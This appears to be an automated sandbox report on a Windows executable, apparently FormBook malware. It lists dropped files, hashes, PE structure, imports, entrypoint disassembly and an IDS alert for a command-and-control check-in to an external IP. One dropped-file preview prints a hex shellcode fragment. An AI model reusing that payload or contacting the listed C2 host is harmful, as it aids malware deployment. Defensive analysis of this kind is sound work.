                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\aut8D99.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):270848
                                          Entropy (8bit):7.993134250488098
                                          Encrypted:true
                                          SSDEEP:6144:7Fx5MWQ69r7WG1hNDlrRBriqbeJ3+8NdaeeKOgkQY/UZVQ1btihB:Bx5V3WG1/PZiFDNRefn/aWtID
                                          MD5:A3F6B9D7C03C4FB2E5137778DA6BD323
                                          SHA1:9F6B160FD5A4958B42DC19F28E07DB736DCAE831
                                          SHA-256:AEA551700EA528FBC5DAC1FDE76DA8E4DDC60A1A261E5E087F21737B64EA709C
                                          SHA-512:A3169A7D7E82AFFBC13B488B44D5C6B332C0DE8CE29F1103B02670F4683771FDFB101815D11194FEAD54A2D6063772AE515CF482DD1BB2B891D5306402A28905
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....328Xl..=..r.31...e4<...ZNG328X4M74NUPZNG328X4M74NUPZN.328V+.94.\.{.F....\$D.>'?=<&^.[9Z#X@n75z<2].Q6..xgn8?>+i>?2|4M74NUP#ON..X?.pWS.h0=.]...bT*.....f. .(...qWS..99&zSU.X4M74NUP..G3~9Y4\n..UPZNG328.4O6?O^PZ^C328X4M74NuEZNG#28X.I74N.PZ^G32:X4K74NUPZNA328X4M74nQPZLG328X4O7t.UPJNG#28X4]74^UPZNG3"8X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M7.:0(.NG3.7\4M'4NU@^NG#28X4M74NUPZNG3.8XTM74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG3

                                          C:\Users\user\AppData\Local\Temp\aut8DD8.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):9804
                                          Entropy (8bit):7.604994315250385
                                          Encrypted:false
                                          SSDEEP:192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOmOz9gD4cwILCLKJf:I6q+Brw/gjYKycraW4cwILCc
                                          MD5:7B6562F2F11AD01AA55C9A4A361A69EF
                                          SHA1:6A8EFAFD621AE6AC7B115C4C1C222A5F12859298
                                          SHA-256:6F965B72025CFFF40F1FBA5A865A2334644BC001563DEB811AF27BCEBBA952FE
                                          SHA-512:2FA3B73012301EA8241DE7A0023E15E25B77C7B5084D1727059594BEEB826DD4AAEEB236750810ACB09B125AF8DE46A29378124359D005C51E8FCB486A18E5ED
                                          Malicious:false
                                          Reputation:low
                                          Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                                          C:\Users\user\AppData\Local\Temp\gobioid

                                          Download File
                                          Process:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          File Type:ASCII text, with very long lines (28756), with no line terminators
                                          Category:modified
                                          Size (bytes):28756
                                          Entropy (8bit):3.5861928446490583
                                          Encrypted:false
                                          SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHt:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rb
                                          MD5:008DF983F881B54E58FCA55BDC6F9B6A
                                          SHA1:D237FA9E24E95E173888914EA48C24348EB2EF50
                                          SHA-256:8EF28ACE4E785A2E441B7E93F17A59E4F219458B1BDB3DDD4811BD3D86FA4C18
                                          SHA-512:6218A9BD480ECB35EAED3F7B63804D5C4BB4753D583D471F5CD130B8D408719FE95ABFECA12950CEE2E91D72203C6655600D9979F3EA8BE16FA498373F8229EB
                                          Malicious:false
                                          Reputation:low
                                          Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                          C:\Users\user\AppData\Local\Temp\seskin

                                          Download File
                                          Process:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):270848
                                          Entropy (8bit):7.993134250488098
                                          Encrypted:true
                                          SSDEEP:6144:7Fx5MWQ69r7WG1hNDlrRBriqbeJ3+8NdaeeKOgkQY/UZVQ1btihB:Bx5V3WG1/PZiFDNRefn/aWtID
                                          MD5:A3F6B9D7C03C4FB2E5137778DA6BD323
                                          SHA1:9F6B160FD5A4958B42DC19F28E07DB736DCAE831
                                          SHA-256:AEA551700EA528FBC5DAC1FDE76DA8E4DDC60A1A261E5E087F21737B64EA709C
                                          SHA-512:A3169A7D7E82AFFBC13B488B44D5C6B332C0DE8CE29F1103B02670F4683771FDFB101815D11194FEAD54A2D6063772AE515CF482DD1BB2B891D5306402A28905
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....328Xl..=..r.31...e4<...ZNG328X4M74NUPZNG328X4M74NUPZN.328V+.94.\.{.F....\$D.>'?=<&^.[9Z#X@n75z<2].Q6..xgn8?>+i>?2|4M74NUP#ON..X?.pWS.h0=.]...bT*.....f. .(...qWS..99&zSU.X4M74NUP..G3~9Y4\n..UPZNG328.4O6?O^PZ^C328X4M74NuEZNG#28X.I74N.PZ^G32:X4K74NUPZNA328X4M74nQPZLG328X4O7t.UPJNG#28X4]74^UPZNG3"8X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M7.:0(.NG3.7\4M'4NU@^NG#28X4M74NUPZNG3.8XTM74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG328X4M74NUPZNG3

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.130712948881586
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:TOgpmvvWoj.exe
                                          File size:1'180'160 bytes
                                          MD5:93e69765594e80ad7f8c1e906f145046
                                          SHA1:f5d842cc344e4e1623dfcdd2ce32c73ee4ad05cb
                                          SHA256:4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0
                                          SHA512:8e6e5d75631b7270ce767e7b89d44d4cbb5bef73ae01d6232c762f6e29ee989efed1b008cb2361e88e5ff35ea376774ad8113590ff37c86cf193037cd0d407d0
                                          SSDEEP:24576:rAHnh+eWsN3skA4RV1Hom2KXMmHaYYfJ1Rs0AncaVu8q5:Gh+ZkldoPK8YaYYfJ2XMt
                                          TLSH:BD45BE0273D1C036FFABA2739B6AF60556BC79254133852F13982DB9BD701B2263D663
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                          File Icon

                                          Icon Hash:aaf3e3e3938382a0

                                          Static PE Info

                                          General

                                          Entrypoint:0x42800a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x667B4D1D [Tue Jun 25 23:05:01 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:1
                                          File Version Major:5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                          Entrypoint Preview

                                          Instruction
                                          call 00007FC454C3206Dh
                                          jmp 00007FC454C24E24h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          push edi
                                          push esi
                                          mov esi, dword ptr [esp+10h]
                                          mov ecx, dword ptr [esp+14h]
                                          mov edi, dword ptr [esp+0Ch]
                                          mov eax, ecx
                                          mov edx, ecx
                                          add eax, esi
                                          cmp edi, esi
                                          jbe 00007FC454C24FAAh
                                          cmp edi, eax
                                          jc 00007FC454C2530Eh
                                          bt dword ptr [004C41FCh], 01h
                                          jnc 00007FC454C24FA9h
                                          rep movsb
                                          jmp 00007FC454C252BCh
                                          cmp ecx, 00000080h
                                          jc 00007FC454C25174h
                                          mov eax, edi
                                          xor eax, esi
                                          test eax, 0000000Fh
                                          jne 00007FC454C24FB0h
                                          bt dword ptr [004BF324h], 01h
                                          jc 00007FC454C25480h
                                          bt dword ptr [004C41FCh], 00000000h
                                          jnc 00007FC454C2514Dh
                                          test edi, 00000003h
                                          jne 00007FC454C2515Eh
                                          test esi, 00000003h
                                          jne 00007FC454C2513Dh
                                          bt edi, 02h
                                          jnc 00007FC454C24FAFh
                                          mov eax, dword ptr [esi]
                                          sub ecx, 04h
                                          lea esi, dword ptr [esi+04h]
                                          mov dword ptr [edi], eax
                                          lea edi, dword ptr [edi+04h]
                                          bt edi, 03h
                                          jnc 00007FC454C24FB3h
                                          movq xmm1, qword ptr [esi]
                                          sub ecx, 08h
                                          lea esi, dword ptr [esi+08h]
                                          movq qword ptr [edi], xmm1
                                          lea edi, dword ptr [edi+08h]
                                          test esi, 00000007h
                                          je 00007FC454C25005h
                                          bt esi, 03h

                                          Rich Headers

                                          Programming Language:
                                          • [ASM] VS2013 build 21005
                                          • [ C ] VS2013 build 21005
                                          • [C++] VS2013 build 21005
                                          • [ C ] VS2008 SP1 build 30729
                                          • [IMP] VS2008 SP1 build 30729
                                          • [ASM] VS2013 UPD5 build 40629
                                          • [RES] VS2013 build 21005
                                          • [LNK] VS2013 UPD5 build 40629

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x55a08.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x7134.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0xc80000x55a080x55c0037b95ce5debdafd9a5847a1266a84308False0.922603862973761data7.884012749927017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x11e0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                          RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                          RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                          RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                          RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                          RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                          RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                          RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                          RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                          RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                          RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                          RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                          RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                          RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                          RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                          RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                          RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                          RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                          RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                          RT_RCDATA0xd07b80x4cccedata1.000336963639716
                                          RT_GROUP_ICON0x11d4880x76dataEnglishGreat Britain0.6610169491525424
                                          RT_GROUP_ICON0x11d5000x14dataEnglishGreat Britain1.25
                                          RT_GROUP_ICON0x11d5140x14dataEnglishGreat Britain1.15
                                          RT_GROUP_ICON0x11d5280x14dataEnglishGreat Britain1.25
                                          RT_VERSION0x11d53c0xdcdataEnglishGreat Britain0.6181818181818182
                                          RT_MANIFEST0x11d6180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                          Imports

                                          DLLImport
                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                          PSAPI.DLLGetProcessMemoryInfo
                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                          UxTheme.dllIsThemeActive
                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishGreat Britain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          07/04/24-16:53:24.553352TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971380192.168.2.7208.91.197.27
